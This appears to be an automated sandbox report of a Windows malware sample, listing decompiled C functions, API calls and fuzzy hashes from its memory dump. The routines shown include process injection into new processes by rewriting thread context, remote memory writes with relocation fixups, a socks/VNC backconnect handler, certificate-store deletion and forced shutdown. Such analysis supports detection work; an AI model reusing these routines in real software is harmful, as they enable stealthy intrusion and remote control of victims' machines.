    • LookupPrivilegeValueW.ADVAPI32(00000000,0040E7CE,?), ref: 00417B3A
    • AdjustTokenPrivileges.ADVAPI32(0040E7CE,00000000,00000001,00000000,00000000,00000000), ref: 00417B4F
    • GetLastError.KERNEL32 ref: 00417B59
    • CloseHandle.KERNEL32(0040E7CE), ref: 00417B68
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 2724707430-0
    • Opcode ID: ad5f9cfdd1ada848cc08bf6bbc4491fc18ca176c9e402f1a99104861d7ef6d13
    • Instruction ID: 10ba094e22f2f7c91229282b227bfb325925309097b7317705a00dda049a8a59
    • Opcode Fuzzy Hash: ad5f9cfdd1ada848cc08bf6bbc4491fc18ca176c9e402f1a99104861d7ef6d13
    • Instruction Fuzzy Hash: DE010071A04208BFEB105FA19D89FEF7BBCAF05788F104166F611E21A0E77499848A69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E004122FC(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
    				struct _CONTEXT _v720;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t32;
    				void* _t36;
    				void* _t37;
    				void** _t45;
    				void* _t46;
    				void* _t47;
    				void** _t50;
    				void* _t52;
    				void* _t53;
    				signed int _t55;
    				void* _t65;
    
    				_t47 = __edx;
    				_t45 = _a4;
    				_t32 =  *0x422964(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
    				_a40 = _t32;
    				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E004068C0() != 0 && GetProcessId( *_t45) != 0) {
    					_t36 = E004066F1(_t46, _t47, _t35);
    					_a44 = _t36;
    					_t63 = _t36;
    					if(_t36 != 0) {
    						_push(_t52);
    						_t37 = E004067D5(_t46,  *_t45, _t52, _t63, _t36, 0);
    						_t50 = _a8;
    						_t53 = _t37;
    						_a32 = _t53;
    						_t55 = _t53 -  *0x422954 + E00406F49;
    						_v720.ContextFlags = 0x10003;
    						if(GetThreadContext( *_t50,  &_v720) == 0) {
    							L12:
    							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
    						} else {
    							_t65 = _v720.Eip -  *0x42296c; // 0x77e5ba60
    							if(_t65 != 0) {
    								goto L12;
    							} else {
    								if(( *0x422940 & 0x00000010) != 0) {
    									_t55 = _t55 ^ _v720.Eax;
    								}
    								_v720.Eax = _t55;
    								_v720.ContextFlags = 0x10002;
    								if(SetThreadContext( *_t50,  &_v720) == 0) {
    									goto L12;
    								}
    							}
    						}
    						CloseHandle(_a44);
    					}
    				}
    				return _a40;
    			}

    APIs
    • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00412328
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • GetProcessId.KERNEL32(?), ref: 00412364
      • Part of subcall function 004066F1: CreateMutexW.KERNEL32(00422978,00000001,?,00422BB8,74B5F560,?,00000002,?,74B5F560), ref: 00406739
      • Part of subcall function 004066F1: GetLastError.KERNEL32 ref: 00406745
      • Part of subcall function 004066F1: CloseHandle.KERNEL32(00000000), ref: 00406753
    • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004123B6
    • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 004123F6
    • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 0041240C
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00412415
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
    • String ID:
    • API String ID: 1044471028-0
    • Opcode ID: 7763b8973ad993beef1afbfcce2c01d04102c6571c4b6563e24f2d50315a1080
    • Instruction ID: 4417533b2c5fa329c76b8ba5198f5b016afe95bd44181aba4fcb8ba7f7169d7a
    • Opcode Fuzzy Hash: 7763b8973ad993beef1afbfcce2c01d04102c6571c4b6563e24f2d50315a1080
    • Instruction Fuzzy Hash: B8316E71201219EBDF119F65DE48BDA3BB9AF08348F008166FD48F2260D7B5D8A4DF58
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(0041BCFB,00000000,00000000,00000001,F0000040,?,0041BCFB,?,00000030,?,?,?,0041C214,00422FF0), ref: 004176DF
    • CryptCreateHash.ADVAPI32(0041BCFB,00008003,00000000,00000000,00000030,?,0041BCFB,?,00000030,?,?,?,0041C214,00422FF0), ref: 004176F7
    • CryptHashData.ADVAPI32(00000030,00000010,0041BCFB,00000000,?,0041BCFB), ref: 00417713
    • CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,0041BCFB), ref: 0041772B
    • CryptDestroyHash.ADVAPI32(00000030,?,0041BCFB), ref: 00417742
    • CryptReleaseContext.ADVAPI32(0041BCFB,00000000,?,0041BCFB,?,00000030,?,?,?,0041C214,00422FF0), ref: 0041774C
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
    • Instruction ID: 720c994dbe868d7eeb92989b9b090fe14949cb5c876e18ace0844df376823ddf
    • Opcode Fuzzy Hash: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
    • Instruction Fuzzy Hash: 07115B7580424CBFEF019BA0DD88EEE7B7DFB04340F008461F591B11A1C7369E949B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00418469() {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				void* _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t22;
    				void* _t28;
    
    				_t22 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
    							_t22 = E0041687F( &_v1036 | 0xffffffff,  &_v1036);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t22;
    			}

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0041847A
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0041848D
    • FreeLibrary.KERNEL32(?), ref: 004184DF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 0421ded5ebcfb26099177bf3416cccccc5a4c13ee2ecbe719625786b9c04511a
    • Instruction ID: 2920c0828ba661fb5a546e69b0b787539e7b356e94aa338657367bac51488808
    • Opcode Fuzzy Hash: 0421ded5ebcfb26099177bf3416cccccc5a4c13ee2ecbe719625786b9c04511a
    • Instruction Fuzzy Hash: 7B016CB1940155BBCB10EBE89D849DE7BBCAB14350F2045BEB755F3290EE348F848B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0041D159(void* __ecx, CHAR** _a4, signed int _a7) {
    				signed int _v6;
    				signed int _v8;
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				short _v30;
    				intOrPtr _v36;
    				char _v44;
    				char _v304;
    				char _v788;
    				char _v792;
    				void* __edi;
    				void* __esi;
    				int _t68;
    				signed short _t70;
    				signed int _t80;
    				void* _t95;
    				signed int _t99;
    				void* _t102;
    				signed int _t108;
    				void* _t112;
    				CHAR** _t121;
    				signed int _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t138;
    				signed int _t139;
    				void* _t141;
    
    				_t123 = __ecx;
    				E004164D4( &_v304,  &_v304, 0, 0x104);
    				_t121 = _a4;
    				if(lstrcmpiA( *_t121, "socks") != 0) {
    					_t68 = lstrcmpiA( *_t121, "vnc");
    					__eflags = _t68;
    					if(_t68 != 0) {
    						_t70 = E00416AA0( *_t121, _t123, 0);
    						_t6 = _t70 - 1; // -1
    						_t123 = _t6;
    						__eflags = _t6 - 0xfffd;
    						if(_t6 > 0xfffd) {
    							L32:
    							E0041A522( &_v304);
    							_a7 = 0;
    							if(_v304 <= 0) {
    								L34:
    								E00416421( *_t121);
    								E00416421(_t121[1]);
    								E00416421(_t121[2]);
    								E00419BF4(_t121[3]);
    								E00416421(_t121);
    								return 0;
    							} else {
    								goto L33;
    							}
    							do {
    								L33:
    								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
    								_a7 = _a7 + 1;
    							} while (_a7 < _v304);
    							goto L34;
    						}
    						_t80 = _t70 & 0x0000ffff;
    						_v24 = _t80;
    						__eflags = _t80;
    						if(_t80 == 0) {
    							goto L32;
    						}
    						L6:
    						_t130 = E004194AA(E00416AA0(_t121[2], _t123, 0), _t123, _t121[1]);
    						_v16 = _t130;
    						if(_t130 == 0xffffffff) {
    							goto L32;
    						}
    						E0041981C(_t123, _t130);
    						E004197DA(_t130);
    						_t89 = E00417278(E00406A66(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
    						_t144 = _t89;
    						if(_t89 == 0) {
    							L31:
    							E004197C4(_t89, _t130);
    							goto L32;
    						}
    						_v9 = E0041CAC7( &_v788, _v36, _t144, _t130, 1, _v44);
    						_t89 = E00417266( &_v44);
    						if(_v9 == 0) {
    							goto L31;
    						}
    						_t89 = E004196D1(0,  &_v16, 0, 0);
    						_t130 = _v16;
    						if(_t89 != _t130) {
    							goto L31;
    						}
    						while(1) {
    							_push(0x7530);
    							_push( &_v8);
    							_t95 = 4;
    							if(E004193D4(_t95, _t130) == 0 || _v8 <= 4) {
    								break;
    							}
    							_t138 = E004163F1(_v8 & 0x0000ffff);
    							_push(0x7530);
    							if(_t138 == 0) {
    								_t127 = _v8 & 0x0000ffff;
    								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
    								L29:
    								_push(_t99);
    								_push(_t130);
    								_t89 = E0041941C(_t127);
    								break;
    							}
    							_push(_t138);
    							_t127 = _t130;
    							_t102 = E004193D4((_v8 & 0x0000ffff) - 4, _t130);
    							_push(_t138);
    							if(_t102 == 0) {
    								L35:
    								_t89 = E00416421();
    								break;
    							}
    							_v30 = _v6;
    							_v28 =  *_t138;
    							E00416421();
    							if(_v6 != 0) {
    								_t139 = E004163F1(_v6 & 0x0000ffff);
    								_t99 = _v6 & 0x0000ffff;
    								_push(0x7530);
    								__eflags = _t139;
    								if(_t139 == 0) {
    									goto L29;
    								}
    								_push(_t139);
    								_t127 = _t130;
    								_t108 = E004193D4(_t99, _t130);
    								__eflags = _t108;
    								if(_t108 == 0) {
    									_push(_t139);
    									goto L35;
    								}
    								_v20 = _t139;
    								L20:
    								if(_v28 == 2 && _v30 == 4) {
    									_t112 = 0xc;
    									_t131 = E004163F1(_t112);
    									if(_t131 != 0) {
    										 *_t131 = _a4;
    										 *((intOrPtr*)(_t131 + 4)) = _v24;
    										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
    										if(E0041A4DD( &_v304, 0x20000, E0041CED0, _t131) == 0) {
    											E00416421(_t131);
    										}
    									}
    									E0041A48B(_t127,  &_v304);
    								}
    								E00416421(_v20);
    								_t89 = E004196D1(0,  &_v16, 0, 0);
    								_t130 = _v16;
    								if(_t89 == _t130) {
    									continue;
    								} else {
    									break;
    								}
    							}
    							_v20 = _v20 & 0x00000000;
    							goto L20;
    						}
    						_t121 = _a4;
    						goto L31;
    					}
    					_v24 = 0xfffffffe;
    					goto L6;
    				}
    				_v24 = _v24 | 0xffffffff;
    				goto L6;
    			}

    APIs
    • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041D188
    • lstrcmpiA.KERNEL32(?,vnc), ref: 0041D19B
    • CloseHandle.KERNEL32(?), ref: 0041D3B8
      • Part of subcall function 0041A4DD: SetLastError.KERNEL32(0000009B,00406D57,00000000,004159EE,00000000,00422838,00000000,00000104,74B5F560,00000000), ref: 0041A4E7
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
    • String ID: socks$vnc
    • API String ID: 3305036421-270151703
    • Opcode ID: 407894ccbe9b462facb202eae69172e4b685f1a2b744b3889e0fea3985d24f34
    • Instruction ID: 202464533ce8aa41e9cb099a8f84b9da7cb3457ded70aa4ab9a89305bb03fbec
    • Opcode Fuzzy Hash: 407894ccbe9b462facb202eae69172e4b685f1a2b744b3889e0fea3985d24f34
    • Instruction Fuzzy Hash: 5271C671D00218AACF11ABA5C841BFE7BB5AF05314F1441ABF960BB281C77C9EC1C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BA9D(WCHAR* __ecx, void* __eflags) {
    				struct _WIN32_FIND_DATAW _v596;
    				short _v1116;
    				WCHAR* _t38;
    				void* _t42;
    
    				_t38 = __ecx;
    				if(E0041BCB4("*",  &_v1116, __ecx) == 0) {
    					L9:
    					SetFileAttributesW(_t38, 0x80);
    					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
    				}
    				_t42 = FindFirstFileW( &_v1116,  &_v596);
    				if(_t42 == 0xffffffff) {
    					goto L9;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(E0041B8B4( &(_v596.cFileName)) == 0 && E0041BCB4( &(_v596.cFileName),  &_v1116, _t38) != 0) {
    						_t51 = _v596.dwFileAttributes & 0x00000010;
    						if((_v596.dwFileAttributes & 0x00000010) == 0) {
    							E0041B785( &_v1116);
    						} else {
    							E0041BA9D( &_v1116, _t51);
    						}
    					}
    				} while (FindNextFileW(_t42,  &_v596) != 0);
    				FindClose(_t42);
    				goto L9;
    			}

    APIs
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BACE
    • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 0041BB29
    • FindClose.KERNEL32(00000000,?,00000000), ref: 0041BB34
    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 0041BB40
    • RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 0041BB47
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
    • String ID:
    • API String ID: 765042924-0
    • Opcode ID: 237f922c78a70e55cc56f3a79aaa4565ac92c51d51cacf4ce3064d4657b29dc6
    • Instruction ID: f42f0f00838b5481297b6434c1cc9889b46f0ccdb6ed3802403677fab7e107eb
    • Opcode Fuzzy Hash: 237f922c78a70e55cc56f3a79aaa4565ac92c51d51cacf4ce3064d4657b29dc6
    • Instruction Fuzzy Hash: E911C4320082085AC320E764DD49EEFB3ACEF49354F04466FB994D25A5EB78A58587DE
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,004033D0), ref: 0040C232
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040C24B
    • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00406EB9), ref: 0040C256
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C25E
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040C26A
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
    • String ID:
    • API String ID: 1842529175-0
    • Opcode ID: 60584b6451722c28f6597c7f759968a0905a1bfa41d00a44ac9d314a7c76855c
    • Instruction ID: 550d0322c588a67aa8199e68f71acf66f16c382dfcc46fff7d739ed52b1edf93
    • Opcode Fuzzy Hash: 60584b6451722c28f6597c7f759968a0905a1bfa41d00a44ac9d314a7c76855c
    • Instruction Fuzzy Hash: 94F0EC31681210E7D61117756E58FE77B5C9F82B51F100177FA85F3AA08E34984185BC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040BA8F() {
    				signed int _v124;
    				signed char _t12;
    				unsigned int _t15;
    				void* _t23;
    				void* _t24;
    
    				_t12 =  *0x422834; // 0x0
    				if((_t12 & 0x00000010) == 0) {
    					__eflags = _t12 & 0x00000008;
    					if(__eflags != 0) {
    						E0040F10A(_t23, _t24, __eflags);
    						_t12 =  *0x422834; // 0x0
    					}
    					__eflags = _t12 & 0x00000003;
    					if((_t12 & 0x00000003) == 0) {
    						__eflags = _t12 & 0x00000004;
    						if((_t12 & 0x00000004) != 0) {
    							goto L8;
    						}
    						goto L9;
    					} else {
    						E00417AED(L"SeShutdownPrivilege");
    						_t15 =  *0x422834; // 0x0
    						__eflags = 0;
    						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
    						return 0;
    					}
    				} else {
    					_t12 = E0041CDE1( &_v124);
    					if(_t12 != 0) {
    						_v124 = _v124 | 0x00000020;
    						 *0x422940 =  *0x422940 | 0x00000010;
    						E0041CE39( &_v124);
    						L8:
    						return ExitWindowsEx(0x14, 0x80000000);
    					}
    					L9:
    					return _t12;
    				}
    			}

    APIs
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040BAF4
      • Part of subcall function 0041CDE1: CreateMutexW.KERNEL32(00422978,00000000,00423FC8,?,?,00410FC6,?,?,?,743C152E,00000002), ref: 0041CE07
    • ExitWindowsEx.USER32(00000014,80000000), ref: 0040BB07
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateExitInitiateMutexShutdownSystemWindows
    • String ID: $SeShutdownPrivilege
    • API String ID: 3829579691-2253681161
    • Opcode ID: abffc308fa9d67fef31268affff93e99ffdabdc05f230a320eaeef5806036dd1
    • Instruction ID: 0dc91cd7f9ee4c1499ee609b40f294ee418b55e21709c3d04dfc56f4513e1a5f
    • Opcode Fuzzy Hash: abffc308fa9d67fef31268affff93e99ffdabdc05f230a320eaeef5806036dd1
    • Instruction Fuzzy Hash: 70F086313107086AEA24A7B45E56BEA7B6CDB00348F54013AED41B62E2C7B9A442CA6C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041AD83(void* __eax, void* _a4) {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				long _v24;
    				void* _t37;
    				void* _t42;
    				intOrPtr* _t43;
    				int _t44;
    				long _t46;
    				void* _t47;
    				SIZE_T* _t48;
    				signed int _t50;
    				void* _t52;
    				void* _t54;
    				void* _t55;
    				void* _t60;
    				intOrPtr _t61;
    				intOrPtr _t62;
    				unsigned int _t64;
    
    				_t55 = __eax;
    				_t1 = _t55 + 0x3c; // 0xd8
    				_t60 =  *_t1 + __eax;
    				_t46 =  *(_t60 + 0x50);
    				_v24 = _t46;
    				_v5 = 0;
    				if(IsBadReadPtr(__eax, _t46) == 0) {
    					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
    					_v12 = _t37;
    					__eflags = _t37;
    					if(__eflags == 0) {
    						L17:
    						return _v12;
    					}
    					_t47 = E00416474(__eflags, _t55, _t46);
    					_t48 = 0;
    					__eflags = _t47;
    					if(_t47 == 0) {
    						L16:
    						VirtualFreeEx(_a4, _v12, 0, 0x8000);
    						_t32 =  &_v12;
    						 *_t32 = _v12 & 0x00000000;
    						__eflags =  *_t32;
    						goto L17;
    					}
    					__eflags =  *(_t60 + 0xa4);
    					if( *(_t60 + 0xa4) <= 0) {
    						L15:
    						E00416421(_t47);
    						__eflags = _v5;
    						if(_v5 != 0) {
    							goto L17;
    						}
    						goto L16;
    					}
    					_t42 =  *(_t60 + 0xa0);
    					__eflags = _t42;
    					if(_t42 <= 0) {
    						goto L15;
    					}
    					_t61 =  *((intOrPtr*)(_t60 + 0x34));
    					_t54 = _v12 - _t61;
    					_v20 = _t55 - _t61;
    					_t43 = _t42 + _t47;
    					while(1) {
    						__eflags =  *_t43 - _t48;
    						if( *_t43 == _t48) {
    							break;
    						}
    						_t62 =  *((intOrPtr*)(_t43 + 4));
    						__eflags = _t62 - 8;
    						if(_t62 < 8) {
    							L12:
    							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
    							_t48 = 0;
    							__eflags = 0;
    							continue;
    						}
    						_t64 = _t62 + 0xfffffff8 >> 1;
    						__eflags = _t64;
    						_v16 = _t48;
    						if(_t64 == 0) {
    							goto L12;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
    							__eflags = _t50;
    							if(_t50 != 0) {
    								_t52 = (_t50 & 0x00000fff) +  *_t43;
    								_t19 = _t52 + _t47;
    								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
    								__eflags =  *_t19;
    							}
    							_v16 = _v16 + 1;
    							__eflags = _v16 - _t64;
    						} while (_v16 < _t64);
    						goto L12;
    					}
    					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
    					__eflags = _t44;
    					_t28 =  &_v5;
    					 *_t28 = _t44 != 0;
    					__eflags =  *_t28;
    					goto L15;
    				}
    				return 0;
    			}

    APIs
    • IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 0041AD9F
    • VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040), ref: 0041ADBD
    • WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,00000000,00000000,00400000,?), ref: 0041AE4F
    • VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,00400000,?), ref: 0041AE74
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Virtual$AllocFreeMemoryProcessReadWrite
    • String ID:
    • API String ID: 1273498236-0
    • Opcode ID: 1c5631be1c6a025212545cc3ad29e2a3260dda70f4c438d802a992a1acec94b2
    • Instruction ID: 2016ab03fd188a559c24ceaa5fa9f490ad7a8f789a602e142d39eede084ac579
    • Opcode Fuzzy Hash: 1c5631be1c6a025212545cc3ad29e2a3260dda70f4c438d802a992a1acec94b2
    • Instruction Fuzzy Hash: CF31B072A41309AFCF108BA4CD84BEEBBB5EF45701F05406AE506B72A0D7749DA1CB59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,00412E7F,?,?), ref: 0041C8E8
    • VariantInit.OLEAUT32(?), ref: 0041C934
    • SysAllocString.OLEAUT32(?), ref: 0041C944
    • VariantClear.OLEAUT32(?), ref: 0041C97D
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Variant$AllocClearCreateInitInstanceString
    • String ID:
    • API String ID: 3126708813-0
    • Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction ID: 9fc86f269e3b91c3a51af9d4d42ee7ef0eb327d348b868b3c45e5bdb8cb59ef2
    • Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction Fuzzy Hash: 25215171940228AFCB109BA5CCC8EEF7BB8EF09750F0405B6F906EB251D67599408BA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417A96(intOrPtr _a4) {
    				intOrPtr _v20;
    				void* _v32;
    				signed int _t6;
    				signed int _t7;
    				int _t9;
    				int _t14;
    				void* _t15;
    
    				_t14 = 0;
    				_t6 = CreateToolhelp32Snapshot(4, 0);
    				_t15 = _t6;
    				_t7 = _t6 | 0xffffffff;
    				if(_t15 != _t7) {
    					_v32 = 0x1c;
    					_t9 = Thread32First(_t15,  &_v32);
    					while(_t9 != 0) {
    						if(_v20 == _a4) {
    							_t14 = _t14 + 1;
    						}
    						_t9 = Thread32Next(_t15,  &_v32);
    					}
    					CloseHandle(_t15);
    					return _t14;
    				}
    				return _t7;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00417AA3
    • Thread32First.KERNEL32 ref: 00417ABE
    • Thread32Next.KERNEL32 ref: 00417AD4
    • CloseHandle.KERNEL32(00000000), ref: 00417ADF
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3643885135-0
    • Opcode ID: 584730450807f66d330768fb13783ff37ab6e15cf2158fba25e729a16c2ae00b
    • Instruction ID: b0b5a733d709de2560576e3368e4358bbbe5beed0d8220b7ac00c3da05f8b9c9
    • Opcode Fuzzy Hash: 584730450807f66d330768fb13783ff37ab6e15cf2158fba25e729a16c2ae00b
    • Instruction Fuzzy Hash: E0F08976504115BBDB20AB65DC08DEF7FBCEF85390B004122FA11E6190D734DE41C6B9
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000001,00000006), ref: 0041956C
    • bind.WS2_32(00000000,?,-0000001D), ref: 0041958C
    • listen.WS2_32(00000000,?), ref: 0041959B
    • closesocket.WS2_32(00000000), ref: 004195A6
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
